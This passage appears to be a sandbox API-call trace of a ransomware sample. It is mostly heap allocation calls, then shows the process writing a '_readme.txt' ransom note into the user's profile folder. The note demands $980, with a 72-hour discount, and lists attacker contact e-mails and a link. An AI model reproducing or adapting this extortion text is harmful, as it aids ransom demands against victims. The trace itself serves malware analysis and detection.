RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.972] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0142.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32723f8 [0142.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1730 [0142.972] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0142.972] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0142.973] PathFindFileNameW (pszPath="") returned="" [0142.973] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.973] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0142.973] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0142.973] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x3221ae8 [0142.973] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3221ae8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0142.973] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x9aaf2b8 [0142.973] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1730 [0142.973] FreeLibrary (hLibModule=0x759d0000) returned 1 [0142.973] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", pMore="_readme.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned 1 [0142.973] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283bf8 | out: hHeap=0x620000) returned 1 [0142.973] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned 0 [0142.974] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x9ad6f98 [0142.974] lstrcpyW (in: lpString1=0x9ad6f98, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" [0142.974] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d", lpString2="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" [0142.974] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9ab03c8 [0142.974] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6f0 [0142.974] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x3221ae8 [0142.974] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x85b) returned 0x325d510 [0142.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", cchWideChar=-1, lpMultiByteStr=0x325d510, cbMultiByte=2139, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", lpUsedDefaultChar=0x0) returned 1116 [0142.974] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x321dfc8 [0142.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 